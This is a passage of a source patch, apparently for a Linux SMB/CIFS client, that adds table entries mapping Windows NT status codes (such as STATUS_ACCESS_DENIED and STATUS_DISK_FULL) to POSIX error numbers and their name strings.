++	{STATUS_WX86_BREAKPOINT, -EIO, "STATUS_WX86_BREAKPOINT"},
++	{STATUS_WX86_EXCEPTION_CONTINUE, -EIO,
++	"STATUS_WX86_EXCEPTION_CONTINUE"},
++	{STATUS_WX86_EXCEPTION_LASTCHANCE, -EIO,
++	"STATUS_WX86_EXCEPTION_LASTCHANCE"},
++	{STATUS_WX86_EXCEPTION_CHAIN, -EIO, "STATUS_WX86_EXCEPTION_CHAIN"},
++	{STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE, -EIO,
++	"STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE"},
++	{STATUS_NO_YIELD_PERFORMED, -EIO, "STATUS_NO_YIELD_PERFORMED"},
++	{STATUS_TIMER_RESUME_IGNORED, -EIO, "STATUS_TIMER_RESUME_IGNORED"},
++	{STATUS_ARBITRATION_UNHANDLED, -EIO, "STATUS_ARBITRATION_UNHANDLED"},
++	{STATUS_CARDBUS_NOT_SUPPORTED, -ENOSYS, "STATUS_CARDBUS_NOT_SUPPORTED"},
++	{STATUS_WX86_CREATEWX86TIB, -EIO, "STATUS_WX86_CREATEWX86TIB"},
++	{STATUS_MP_PROCESSOR_MISMATCH, -EIO, "STATUS_MP_PROCESSOR_MISMATCH"},
++	{STATUS_HIBERNATED, -EIO, "STATUS_HIBERNATED"},
++	{STATUS_RESUME_HIBERNATION, -EIO, "STATUS_RESUME_HIBERNATION"},
++	{STATUS_FIRMWARE_UPDATED, -EIO, "STATUS_FIRMWARE_UPDATED"},
++	{STATUS_DRIVERS_LEAKING_LOCKED_PAGES, -EIO,
++	"STATUS_DRIVERS_LEAKING_LOCKED_PAGES"},
++	{STATUS_MESSAGE_RETRIEVED, -EIO, "STATUS_MESSAGE_RETRIEVED"},
++	{STATUS_SYSTEM_POWERSTATE_TRANSITION, -EIO,
++	"STATUS_SYSTEM_POWERSTATE_TRANSITION"},
++	{STATUS_ALPC_CHECK_COMPLETION_LIST, -EIO,
++	"STATUS_ALPC_CHECK_COMPLETION_LIST"},
++	{STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION, -EIO,
++	"STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION"},
++	{STATUS_ACCESS_AUDIT_BY_POLICY, -EIO, "STATUS_ACCESS_AUDIT_BY_POLICY"},
++	{STATUS_ABANDON_HIBERFILE, -EIO, "STATUS_ABANDON_HIBERFILE"},
++	{STATUS_BIZRULES_NOT_ENABLED, -EIO, "STATUS_BIZRULES_NOT_ENABLED"},
++	{STATUS_WAKE_SYSTEM, -EIO, "STATUS_WAKE_SYSTEM"},
++	{STATUS_DS_SHUTTING_DOWN, -EIO, "STATUS_DS_SHUTTING_DOWN"},
++	{DBG_REPLY_LATER, -EIO, "DBG_REPLY_LATER"},
++	{DBG_UNABLE_TO_PROVIDE_HANDLE, -EIO, "DBG_UNABLE_TO_PROVIDE_HANDLE"},
++	{DBG_TERMINATE_THREAD, -EIO, "DBG_TERMINATE_THREAD"},
++	{DBG_TERMINATE_PROCESS, -EIO, "DBG_TERMINATE_PROCESS"},
++	{DBG_CONTROL_C, -EIO, "DBG_CONTROL_C"},
++	{DBG_PRINTEXCEPTION_C, -EIO, "DBG_PRINTEXCEPTION_C"},
++	{DBG_RIPEXCEPTION, -EIO, "DBG_RIPEXCEPTION"},
++	{DBG_CONTROL_BREAK, -EIO, "DBG_CONTROL_BREAK"},
++	{DBG_COMMAND_EXCEPTION, -EIO, "DBG_COMMAND_EXCEPTION"},
++	{RPC_NT_UUID_LOCAL_ONLY, -EIO, "RPC_NT_UUID_LOCAL_ONLY"},
++	{RPC_NT_SEND_INCOMPLETE, -EIO, "RPC_NT_SEND_INCOMPLETE"},
++	{STATUS_CTX_CDM_CONNECT, -EIO, "STATUS_CTX_CDM_CONNECT"},
++	{STATUS_CTX_CDM_DISCONNECT, -EIO, "STATUS_CTX_CDM_DISCONNECT"},
++	{STATUS_SXS_RELEASE_ACTIVATION_CONTEXT, -EIO,
++	"STATUS_SXS_RELEASE_ACTIVATION_CONTEXT"},
++	{STATUS_RECOVERY_NOT_NEEDED, -EIO, "STATUS_RECOVERY_NOT_NEEDED"},
++	{STATUS_RM_ALREADY_STARTED, -EIO, "STATUS_RM_ALREADY_STARTED"},
++	{STATUS_LOG_NO_RESTART, -EIO, "STATUS_LOG_NO_RESTART"},
++	{STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST, -EIO,
++	"STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST"},
++	{STATUS_GRAPHICS_PARTIAL_DATA_POPULATED, -EIO,
++	"STATUS_GRAPHICS_PARTIAL_DATA_POPULATED"},
++	{STATUS_GRAPHICS_DRIVER_MISMATCH, -EIO,
++	"STATUS_GRAPHICS_DRIVER_MISMATCH"},
++	{STATUS_GRAPHICS_MODE_NOT_PINNED, -EIO,
++	"STATUS_GRAPHICS_MODE_NOT_PINNED"},
++	{STATUS_GRAPHICS_NO_PREFERRED_MODE, -EIO,
++	"STATUS_GRAPHICS_NO_PREFERRED_MODE"},
++	{STATUS_GRAPHICS_DATASET_IS_EMPTY, -EIO,
++	"STATUS_GRAPHICS_DATASET_IS_EMPTY"},
++	{STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET, -EIO,
++	"STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET"},
++	{STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED, -EIO,
++	"STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED"},
++	{STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS, -EIO,
++	"STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS"},
++	{STATUS_GRAPHICS_LEADLINK_START_DEFERRED, -EIO,
++	"STATUS_GRAPHICS_LEADLINK_START_DEFERRED"},
++	{STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY, -EIO,
++	"STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY"},
++	{STATUS_GRAPHICS_START_DEFERRED, -EIO,
++	"STATUS_GRAPHICS_START_DEFERRED"},
++	{STATUS_NDIS_INDICATION_REQUIRED, -EIO,
++	"STATUS_NDIS_INDICATION_REQUIRED"},
++	{STATUS_GUARD_PAGE_VIOLATION, -EIO, "STATUS_GUARD_PAGE_VIOLATION"},
++	{STATUS_DATATYPE_MISALIGNMENT, -EIO, "STATUS_DATATYPE_MISALIGNMENT"},
++	{STATUS_BREAKPOINT, -EIO, "STATUS_BREAKPOINT"},
++	{STATUS_SINGLE_STEP, -EIO, "STATUS_SINGLE_STEP"},
++	{STATUS_BUFFER_OVERFLOW, -E2BIG, "STATUS_BUFFER_OVERFLOW"},
++	{STATUS_NO_MORE_FILES, -ENODATA, "STATUS_NO_MORE_FILES"},
++	{STATUS_WAKE_SYSTEM_DEBUGGER, -EIO, "STATUS_WAKE_SYSTEM_DEBUGGER"},
++	{STATUS_HANDLES_CLOSED, -EIO, "STATUS_HANDLES_CLOSED"},
++	{STATUS_NO_INHERITANCE, -EIO, "STATUS_NO_INHERITANCE"},
++	{STATUS_GUID_SUBSTITUTION_MADE, -EIO, "STATUS_GUID_SUBSTITUTION_MADE"},
++	{STATUS_PARTIAL_COPY, -EIO, "STATUS_PARTIAL_COPY"},
++	{STATUS_DEVICE_PAPER_EMPTY, -EIO, "STATUS_DEVICE_PAPER_EMPTY"},
++	{STATUS_DEVICE_POWERED_OFF, -EIO, "STATUS_DEVICE_POWERED_OFF"},
++	{STATUS_DEVICE_OFF_LINE, -EIO, "STATUS_DEVICE_OFF_LINE"},
++	{STATUS_DEVICE_BUSY, -EBUSY, "STATUS_DEVICE_BUSY"},
++	{STATUS_NO_MORE_EAS, -EIO, "STATUS_NO_MORE_EAS"},
++	{STATUS_INVALID_EA_NAME, -EINVAL, "STATUS_INVALID_EA_NAME"},
++	{STATUS_EA_LIST_INCONSISTENT, -EIO, "STATUS_EA_LIST_INCONSISTENT"},
++	{STATUS_INVALID_EA_FLAG, -EINVAL, "STATUS_INVALID_EA_FLAG"},
++	{STATUS_VERIFY_REQUIRED, -EIO, "STATUS_VERIFY_REQUIRED"},
++	{STATUS_EXTRANEOUS_INFORMATION, -EIO, "STATUS_EXTRANEOUS_INFORMATION"},
++	{STATUS_RXACT_COMMIT_NECESSARY, -EIO, "STATUS_RXACT_COMMIT_NECESSARY"},
++	{STATUS_NO_MORE_ENTRIES, -EIO, "STATUS_NO_MORE_ENTRIES"},
++	{STATUS_FILEMARK_DETECTED, -EIO, "STATUS_FILEMARK_DETECTED"},
++	{STATUS_MEDIA_CHANGED, -EIO, "STATUS_MEDIA_CHANGED"},
++	{STATUS_BUS_RESET, -EIO, "STATUS_BUS_RESET"},
++	{STATUS_END_OF_MEDIA, -EIO, "STATUS_END_OF_MEDIA"},
++	{STATUS_BEGINNING_OF_MEDIA, -EIO, "STATUS_BEGINNING_OF_MEDIA"},
++	{STATUS_MEDIA_CHECK, -EIO, "STATUS_MEDIA_CHECK"},
++	{STATUS_SETMARK_DETECTED, -EIO, "STATUS_SETMARK_DETECTED"},
++	{STATUS_NO_DATA_DETECTED, -EIO, "STATUS_NO_DATA_DETECTED"},
++	{STATUS_REDIRECTOR_HAS_OPEN_HANDLES, -EIO,
++	"STATUS_REDIRECTOR_HAS_OPEN_HANDLES"},
++	{STATUS_SERVER_HAS_OPEN_HANDLES, -EIO,
++	"STATUS_SERVER_HAS_OPEN_HANDLES"},
++	{STATUS_ALREADY_DISCONNECTED, -EIO, "STATUS_ALREADY_DISCONNECTED"},
++	{STATUS_LONGJUMP, -EIO, "STATUS_LONGJUMP"},
++	{STATUS_CLEANER_CARTRIDGE_INSTALLED, -EIO,
++	"STATUS_CLEANER_CARTRIDGE_INSTALLED"},
++	{STATUS_PLUGPLAY_QUERY_VETOED, -EIO, "STATUS_PLUGPLAY_QUERY_VETOED"},
++	{STATUS_UNWIND_CONSOLIDATE, -EIO, "STATUS_UNWIND_CONSOLIDATE"},
++	{STATUS_REGISTRY_HIVE_RECOVERED, -EIO,
++	"STATUS_REGISTRY_HIVE_RECOVERED"},
++	{STATUS_DLL_MIGHT_BE_INSECURE, -EIO, "STATUS_DLL_MIGHT_BE_INSECURE"},
++	{STATUS_DLL_MIGHT_BE_INCOMPATIBLE, -EIO,
++	"STATUS_DLL_MIGHT_BE_INCOMPATIBLE"},
++	{STATUS_STOPPED_ON_SYMLINK, -EOPNOTSUPP, "STATUS_STOPPED_ON_SYMLINK"},
++	{STATUS_IO_REPARSE_TAG_NOT_HANDLED, -EOPNOTSUPP,
++	"STATUS_REPARSE_NOT_HANDLED"},
++	{STATUS_DEVICE_REQUIRES_CLEANING, -EIO,
++	"STATUS_DEVICE_REQUIRES_CLEANING"},
++	{STATUS_DEVICE_DOOR_OPEN, -EIO, "STATUS_DEVICE_DOOR_OPEN"},
++	{STATUS_DATA_LOST_REPAIR, -EIO, "STATUS_DATA_LOST_REPAIR"},
++	{DBG_EXCEPTION_NOT_HANDLED, -EIO, "DBG_EXCEPTION_NOT_HANDLED"},
++	{STATUS_CLUSTER_NODE_ALREADY_UP, -EIO,
++	"STATUS_CLUSTER_NODE_ALREADY_UP"},
++	{STATUS_CLUSTER_NODE_ALREADY_DOWN, -EIO,
++	"STATUS_CLUSTER_NODE_ALREADY_DOWN"},
++	{STATUS_CLUSTER_NETWORK_ALREADY_ONLINE, -EIO,
++	"STATUS_CLUSTER_NETWORK_ALREADY_ONLINE"},
++	{STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE, -EIO,
++	"STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE"},
++	{STATUS_CLUSTER_NODE_ALREADY_MEMBER, -EIO,
++	"STATUS_CLUSTER_NODE_ALREADY_MEMBER"},
++	{STATUS_COULD_NOT_RESIZE_LOG, -EIO, "STATUS_COULD_NOT_RESIZE_LOG"},
++	{STATUS_NO_TXF_METADATA, -EIO, "STATUS_NO_TXF_METADATA"},
++	{STATUS_CANT_RECOVER_WITH_HANDLE_OPEN, -EIO,
++	"STATUS_CANT_RECOVER_WITH_HANDLE_OPEN"},
++	{STATUS_TXF_METADATA_ALREADY_PRESENT, -EIO,
++	"STATUS_TXF_METADATA_ALREADY_PRESENT"},
++	{STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET, -EIO,
++	"STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET"},
++	{STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED, -EIO,
++	"STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED"},
++	{STATUS_FLT_BUFFER_TOO_SMALL, -ENOBUFS, "STATUS_FLT_BUFFER_TOO_SMALL"},
++	{STATUS_FVE_PARTIAL_METADATA, -EIO, "STATUS_FVE_PARTIAL_METADATA"},
++	{STATUS_UNSUCCESSFUL, -EIO, "STATUS_UNSUCCESSFUL"},
++	{STATUS_NOT_IMPLEMENTED, -EOPNOTSUPP, "STATUS_NOT_IMPLEMENTED"},
++	{STATUS_INVALID_INFO_CLASS, -EIO, "STATUS_INVALID_INFO_CLASS"},
++	{STATUS_INFO_LENGTH_MISMATCH, -EIO, "STATUS_INFO_LENGTH_MISMATCH"},
++	{STATUS_ACCESS_VIOLATION, -EACCES, "STATUS_ACCESS_VIOLATION"},
++	{STATUS_IN_PAGE_ERROR, -EFAULT, "STATUS_IN_PAGE_ERROR"},
++	{STATUS_PAGEFILE_QUOTA, -EDQUOT, "STATUS_PAGEFILE_QUOTA"},
++	{STATUS_INVALID_HANDLE, -EBADF, "STATUS_INVALID_HANDLE"},
++	{STATUS_BAD_INITIAL_STACK, -EIO, "STATUS_BAD_INITIAL_STACK"},
++	{STATUS_BAD_INITIAL_PC, -EIO, "STATUS_BAD_INITIAL_PC"},
++	{STATUS_INVALID_CID, -EIO, "STATUS_INVALID_CID"},
++	{STATUS_TIMER_NOT_CANCELED, -EIO, "STATUS_TIMER_NOT_CANCELED"},
++	{STATUS_INVALID_PARAMETER, -EINVAL, "STATUS_INVALID_PARAMETER"},
++	{STATUS_NO_SUCH_DEVICE, -ENODEV, "STATUS_NO_SUCH_DEVICE"},
++	{STATUS_NO_SUCH_FILE, -ENOENT, "STATUS_NO_SUCH_FILE"},
++	{STATUS_INVALID_DEVICE_REQUEST, -EOPNOTSUPP, "STATUS_INVALID_DEVICE_REQUEST"},
++	{STATUS_END_OF_FILE, -ENODATA, "STATUS_END_OF_FILE"},
++	{STATUS_WRONG_VOLUME, -EIO, "STATUS_WRONG_VOLUME"},
++	{STATUS_NO_MEDIA_IN_DEVICE, -EIO, "STATUS_NO_MEDIA_IN_DEVICE"},
++	{STATUS_UNRECOGNIZED_MEDIA, -EIO, "STATUS_UNRECOGNIZED_MEDIA"},
++	{STATUS_NONEXISTENT_SECTOR, -EIO, "STATUS_NONEXISTENT_SECTOR"},
++	{STATUS_MORE_PROCESSING_REQUIRED, -EIO,
++	"STATUS_MORE_PROCESSING_REQUIRED"},
++	{STATUS_NO_MEMORY, -EREMOTEIO, "STATUS_NO_MEMORY"},
++	{STATUS_CONFLICTING_ADDRESSES, -EADDRINUSE,
++	"STATUS_CONFLICTING_ADDRESSES"},
++	{STATUS_NOT_MAPPED_VIEW, -EIO, "STATUS_NOT_MAPPED_VIEW"},
++	{STATUS_UNABLE_TO_FREE_VM, -EIO, "STATUS_UNABLE_TO_FREE_VM"},
++	{STATUS_UNABLE_TO_DELETE_SECTION, -EIO,
++	"STATUS_UNABLE_TO_DELETE_SECTION"},
++	{STATUS_INVALID_SYSTEM_SERVICE, -EIO, "STATUS_INVALID_SYSTEM_SERVICE"},
++	{STATUS_ILLEGAL_INSTRUCTION, -EIO, "STATUS_ILLEGAL_INSTRUCTION"},
++	{STATUS_INVALID_LOCK_SEQUENCE, -EIO, "STATUS_INVALID_LOCK_SEQUENCE"},
++	{STATUS_INVALID_VIEW_SIZE, -EIO, "STATUS_INVALID_VIEW_SIZE"},
++	{STATUS_INVALID_FILE_FOR_SECTION, -EIO,
++	"STATUS_INVALID_FILE_FOR_SECTION"},
++	{STATUS_ALREADY_COMMITTED, -EIO, "STATUS_ALREADY_COMMITTED"},
++	{STATUS_ACCESS_DENIED, -EACCES, "STATUS_ACCESS_DENIED"},
++	{STATUS_BUFFER_TOO_SMALL, -EIO, "STATUS_BUFFER_TOO_SMALL"},
++	{STATUS_OBJECT_TYPE_MISMATCH, -EIO, "STATUS_OBJECT_TYPE_MISMATCH"},
++	{STATUS_NONCONTINUABLE_EXCEPTION, -EIO,
++	"STATUS_NONCONTINUABLE_EXCEPTION"},
++	{STATUS_INVALID_DISPOSITION, -EIO, "STATUS_INVALID_DISPOSITION"},
++	{STATUS_UNWIND, -EIO, "STATUS_UNWIND"},
++	{STATUS_BAD_STACK, -EIO, "STATUS_BAD_STACK"},
++	{STATUS_INVALID_UNWIND_TARGET, -EIO, "STATUS_INVALID_UNWIND_TARGET"},
++	{STATUS_NOT_LOCKED, -EIO, "STATUS_NOT_LOCKED"},
++	{STATUS_PARITY_ERROR, -EIO, "STATUS_PARITY_ERROR"},
++	{STATUS_UNABLE_TO_DECOMMIT_VM, -EIO, "STATUS_UNABLE_TO_DECOMMIT_VM"},
++	{STATUS_NOT_COMMITTED, -EIO, "STATUS_NOT_COMMITTED"},
++	{STATUS_INVALID_PORT_ATTRIBUTES, -EIO,
++	"STATUS_INVALID_PORT_ATTRIBUTES"},
++	{STATUS_PORT_MESSAGE_TOO_LONG, -EIO, "STATUS_PORT_MESSAGE_TOO_LONG"},
++	{STATUS_INVALID_PARAMETER_MIX, -EINVAL, "STATUS_INVALID_PARAMETER_MIX"},
++	{STATUS_INVALID_QUOTA_LOWER, -EIO, "STATUS_INVALID_QUOTA_LOWER"},
++	{STATUS_DISK_CORRUPT_ERROR, -EIO, "STATUS_DISK_CORRUPT_ERROR"},
++	{STATUS_OBJECT_NAME_INVALID, -ENOENT, "STATUS_OBJECT_NAME_INVALID"},
++	{STATUS_OBJECT_NAME_NOT_FOUND, -ENOENT, "STATUS_OBJECT_NAME_NOT_FOUND"},
++	{STATUS_OBJECT_NAME_COLLISION, -EEXIST, "STATUS_OBJECT_NAME_COLLISION"},
++	{STATUS_PORT_DISCONNECTED, -EIO, "STATUS_PORT_DISCONNECTED"},
++	{STATUS_DEVICE_ALREADY_ATTACHED, -EIO,
++	"STATUS_DEVICE_ALREADY_ATTACHED"},
++	{STATUS_OBJECT_PATH_INVALID, -ENOTDIR, "STATUS_OBJECT_PATH_INVALID"},
++	{STATUS_OBJECT_PATH_NOT_FOUND, -ENOENT, "STATUS_OBJECT_PATH_NOT_FOUND"},
++	{STATUS_OBJECT_PATH_SYNTAX_BAD, -EIO, "STATUS_OBJECT_PATH_SYNTAX_BAD"},
++	{STATUS_DATA_OVERRUN, -EIO, "STATUS_DATA_OVERRUN"},
++	{STATUS_DATA_LATE_ERROR, -EIO, "STATUS_DATA_LATE_ERROR"},
++	{STATUS_DATA_ERROR, -EIO, "STATUS_DATA_ERROR"},
++	{STATUS_CRC_ERROR, -EIO, "STATUS_CRC_ERROR"},
++	{STATUS_SECTION_TOO_BIG, -EIO, "STATUS_SECTION_TOO_BIG"},
++	{STATUS_PORT_CONNECTION_REFUSED, -ECONNREFUSED,
++	"STATUS_PORT_CONNECTION_REFUSED"},
++	{STATUS_INVALID_PORT_HANDLE, -EIO, "STATUS_INVALID_PORT_HANDLE"},
++	{STATUS_SHARING_VIOLATION, -EBUSY, "STATUS_SHARING_VIOLATION"},
++	{STATUS_QUOTA_EXCEEDED, -EDQUOT, "STATUS_QUOTA_EXCEEDED"},
++	{STATUS_INVALID_PAGE_PROTECTION, -EIO,
++	"STATUS_INVALID_PAGE_PROTECTION"},
++	{STATUS_MUTANT_NOT_OWNED, -EIO, "STATUS_MUTANT_NOT_OWNED"},
++	{STATUS_SEMAPHORE_LIMIT_EXCEEDED, -EIO,
++	"STATUS_SEMAPHORE_LIMIT_EXCEEDED"},
++	{STATUS_PORT_ALREADY_SET, -EIO, "STATUS_PORT_ALREADY_SET"},
++	{STATUS_SECTION_NOT_IMAGE, -EIO, "STATUS_SECTION_NOT_IMAGE"},
++	{STATUS_SUSPEND_COUNT_EXCEEDED, -EIO, "STATUS_SUSPEND_COUNT_EXCEEDED"},
++	{STATUS_THREAD_IS_TERMINATING, -EIO, "STATUS_THREAD_IS_TERMINATING"},
++	{STATUS_BAD_WORKING_SET_LIMIT, -EIO, "STATUS_BAD_WORKING_SET_LIMIT"},
++	{STATUS_INCOMPATIBLE_FILE_MAP, -EIO, "STATUS_INCOMPATIBLE_FILE_MAP"},
++	{STATUS_SECTION_PROTECTION, -EIO, "STATUS_SECTION_PROTECTION"},
++	{STATUS_EAS_NOT_SUPPORTED, -EOPNOTSUPP, "STATUS_EAS_NOT_SUPPORTED"},
++	{STATUS_EA_TOO_LARGE, -EIO, "STATUS_EA_TOO_LARGE"},
++	{STATUS_NONEXISTENT_EA_ENTRY, -EIO, "STATUS_NONEXISTENT_EA_ENTRY"},
++	{STATUS_NO_EAS_ON_FILE, -ENODATA, "STATUS_NO_EAS_ON_FILE"},
++	{STATUS_EA_CORRUPT_ERROR, -EIO, "STATUS_EA_CORRUPT_ERROR"},
++	{STATUS_FILE_LOCK_CONFLICT, -EACCES, "STATUS_FILE_LOCK_CONFLICT"},
++	{STATUS_LOCK_NOT_GRANTED, -EACCES, "STATUS_LOCK_NOT_GRANTED"},
++	{STATUS_DELETE_PENDING, -ENOENT, "STATUS_DELETE_PENDING"},
++	{STATUS_CTL_FILE_NOT_SUPPORTED, -ENOSYS,
++	"STATUS_CTL_FILE_NOT_SUPPORTED"},
++	{STATUS_UNKNOWN_REVISION, -EIO, "STATUS_UNKNOWN_REVISION"},
++	{STATUS_REVISION_MISMATCH, -EIO, "STATUS_REVISION_MISMATCH"},
++	{STATUS_INVALID_OWNER, -EIO, "STATUS_INVALID_OWNER"},
++	{STATUS_INVALID_PRIMARY_GROUP, -EIO, "STATUS_INVALID_PRIMARY_GROUP"},
++	{STATUS_NO_IMPERSONATION_TOKEN, -EIO, "STATUS_NO_IMPERSONATION_TOKEN"},
++	{STATUS_CANT_DISABLE_MANDATORY, -EIO, "STATUS_CANT_DISABLE_MANDATORY"},
++	{STATUS_NO_LOGON_SERVERS, -EIO, "STATUS_NO_LOGON_SERVERS"},
++	{STATUS_NO_SUCH_LOGON_SESSION, -EIO, "STATUS_NO_SUCH_LOGON_SESSION"},
++	{STATUS_NO_SUCH_PRIVILEGE, -EIO, "STATUS_NO_SUCH_PRIVILEGE"},
++	{STATUS_PRIVILEGE_NOT_HELD, -EIO, "STATUS_PRIVILEGE_NOT_HELD"},
++	{STATUS_INVALID_ACCOUNT_NAME, -EIO, "STATUS_INVALID_ACCOUNT_NAME"},
++	{STATUS_USER_EXISTS, -EIO, "STATUS_USER_EXISTS"},
++	{STATUS_NO_SUCH_USER, -EIO, "STATUS_NO_SUCH_USER"},
++	{STATUS_GROUP_EXISTS, -EIO, "STATUS_GROUP_EXISTS"},
++	{STATUS_NO_SUCH_GROUP, -EIO, "STATUS_NO_SUCH_GROUP"},
++	{STATUS_MEMBER_IN_GROUP, -EIO, "STATUS_MEMBER_IN_GROUP"},
++	{STATUS_MEMBER_NOT_IN_GROUP, -EIO, "STATUS_MEMBER_NOT_IN_GROUP"},
++	{STATUS_LAST_ADMIN, -EIO, "STATUS_LAST_ADMIN"},
++	{STATUS_WRONG_PASSWORD, -EACCES, "STATUS_WRONG_PASSWORD"},
++	{STATUS_ILL_FORMED_PASSWORD, -EINVAL, "STATUS_ILL_FORMED_PASSWORD"},
++	{STATUS_PASSWORD_RESTRICTION, -EACCES, "STATUS_PASSWORD_RESTRICTION"},
++	{STATUS_LOGON_FAILURE, -EACCES, "STATUS_LOGON_FAILURE"},
++	{STATUS_ACCOUNT_RESTRICTION, -EACCES, "STATUS_ACCOUNT_RESTRICTION"},
++	{STATUS_INVALID_LOGON_HOURS, -EACCES, "STATUS_INVALID_LOGON_HOURS"},
++	{STATUS_INVALID_WORKSTATION, -EACCES, "STATUS_INVALID_WORKSTATION"},
++	{STATUS_PASSWORD_EXPIRED, -EKEYEXPIRED, "STATUS_PASSWORD_EXPIRED"},
++	{STATUS_ACCOUNT_DISABLED, -EKEYREVOKED, "STATUS_ACCOUNT_DISABLED"},
++	{STATUS_NONE_MAPPED, -EIO, "STATUS_NONE_MAPPED"},
++	{STATUS_TOO_MANY_LUIDS_REQUESTED, -EIO,
++	"STATUS_TOO_MANY_LUIDS_REQUESTED"},
++	{STATUS_LUIDS_EXHAUSTED, -EIO, "STATUS_LUIDS_EXHAUSTED"},
++	{STATUS_INVALID_SUB_AUTHORITY, -EIO, "STATUS_INVALID_SUB_AUTHORITY"},
++	{STATUS_INVALID_ACL, -EIO, "STATUS_INVALID_ACL"},
++	{STATUS_INVALID_SID, -EIO, "STATUS_INVALID_SID"},
++	{STATUS_INVALID_SECURITY_DESCR, -EIO, "STATUS_INVALID_SECURITY_DESCR"},
++	{STATUS_PROCEDURE_NOT_FOUND, -EIO, "STATUS_PROCEDURE_NOT_FOUND"},
++	{STATUS_INVALID_IMAGE_FORMAT, -EIO, "STATUS_INVALID_IMAGE_FORMAT"},
++	{STATUS_NO_TOKEN, -EIO, "STATUS_NO_TOKEN"},
++	{STATUS_BAD_INHERITANCE_ACL, -EIO, "STATUS_BAD_INHERITANCE_ACL"},
++	{STATUS_RANGE_NOT_LOCKED, -EIO, "STATUS_RANGE_NOT_LOCKED"},
++	{STATUS_DISK_FULL, -ENOSPC, "STATUS_DISK_FULL"},
++	{STATUS_SERVER_DISABLED, -EIO, "STATUS_SERVER_DISABLED"},
++	{STATUS_SERVER_NOT_DISABLED, -EIO, "STATUS_SERVER_NOT_DISABLED"},
++	{STATUS_TOO_MANY_GUIDS_REQUESTED, -EIO,
++	"STATUS_TOO_MANY_GUIDS_REQUESTED"},
++	{STATUS_GUIDS_EXHAUSTED, -EIO, "STATUS_GUIDS_EXHAUSTED"},
++	{STATUS_INVALID_ID_AUTHORITY, -EIO, "STATUS_INVALID_ID_AUTHORITY"},
++	{STATUS_AGENTS_EXHAUSTED, -EIO, "STATUS_AGENTS_EXHAUSTED"},
++	{STATUS_INVALID_VOLUME_LABEL, -EIO, "STATUS_INVALID_VOLUME_LABEL"},
++	{STATUS_SECTION_NOT_EXTENDED, -EIO, "STATUS_SECTION_NOT_EXTENDED"},
++	{STATUS_NOT_MAPPED_DATA, -EIO, "STATUS_NOT_MAPPED_DATA"},
++	{STATUS_RESOURCE_DATA_NOT_FOUND, -EIO,
++	"STATUS_RESOURCE_DATA_NOT_FOUND"},
++	{STATUS_RESOURCE_TYPE_NOT_FOUND, -EIO,
++	"STATUS_RESOURCE_TYPE_NOT_FOUND"},
++	{STATUS_RESOURCE_NAME_NOT_FOUND, -EIO,
++	"STATUS_RESOURCE_NAME_NOT_FOUND"},
++	{STATUS_ARRAY_BOUNDS_EXCEEDED, -EIO, "STATUS_ARRAY_BOUNDS_EXCEEDED"},
++	{STATUS_FLOAT_DENORMAL_OPERAND, -EIO, "STATUS_FLOAT_DENORMAL_OPERAND"},
++	{STATUS_FLOAT_DIVIDE_BY_ZERO, -EIO, "STATUS_FLOAT_DIVIDE_BY_ZERO"},
++	{STATUS_FLOAT_INEXACT_RESULT, -EIO, "STATUS_FLOAT_INEXACT_RESULT"},
++	{STATUS_FLOAT_INVALID_OPERATION, -EIO,
++	"STATUS_FLOAT_INVALID_OPERATION"},
++	{STATUS_FLOAT_OVERFLOW, -EIO, "STATUS_FLOAT_OVERFLOW"},
++	{STATUS_FLOAT_STACK_CHECK, -EIO, "STATUS_FLOAT_STACK_CHECK"},
++	{STATUS_FLOAT_UNDERFLOW, -EIO, "STATUS_FLOAT_UNDERFLOW"},
++	{STATUS_INTEGER_DIVIDE_BY_ZERO, -EIO, "STATUS_INTEGER_DIVIDE_BY_ZERO"},
++	{STATUS_INTEGER_OVERFLOW, -EIO, "STATUS_INTEGER_OVERFLOW"},
++	{STATUS_PRIVILEGED_INSTRUCTION, -EIO, "STATUS_PRIVILEGED_INSTRUCTION"},
++	{STATUS_TOO_MANY_PAGING_FILES, -EIO, "STATUS_TOO_MANY_PAGING_FILES"},
++	{STATUS_FILE_INVALID, -EIO, "STATUS_FILE_INVALID"},
++	{STATUS_ALLOTTED_SPACE_EXCEEDED, -EIO,
++	"STATUS_ALLOTTED_SPACE_EXCEEDED"},
++	{STATUS_INSUFFICIENT_RESOURCES, -EAGAIN,
++				"STATUS_INSUFFICIENT_RESOURCES"},
++	{STATUS_DFS_EXIT_PATH_FOUND, -EIO, "STATUS_DFS_EXIT_PATH_FOUND"},
++	{STATUS_DEVICE_DATA_ERROR, -EIO, "STATUS_DEVICE_DATA_ERROR"},
++	{STATUS_DEVICE_NOT_CONNECTED, -EIO, "STATUS_DEVICE_NOT_CONNECTED"},
++	{STATUS_DEVICE_POWER_FAILURE, -EIO, "STATUS_DEVICE_POWER_FAILURE"},
++	{STATUS_FREE_VM_NOT_AT_BASE, -EIO, "STATUS_FREE_VM_NOT_AT_BASE"},
++	{STATUS_MEMORY_NOT_ALLOCATED, -EFAULT, "STATUS_MEMORY_NOT_ALLOCATED"},
++	{STATUS_WORKING_SET_QUOTA, -EIO, "STATUS_WORKING_SET_QUOTA"},
++	{STATUS_MEDIA_WRITE_PROTECTED, -EROFS, "STATUS_MEDIA_WRITE_PROTECTED"},
++	{STATUS_DEVICE_NOT_READY, -EIO, "STATUS_DEVICE_NOT_READY"},
++	{STATUS_INVALID_GROUP_ATTRIBUTES, -EIO,
++	"STATUS_INVALID_GROUP_ATTRIBUTES"},
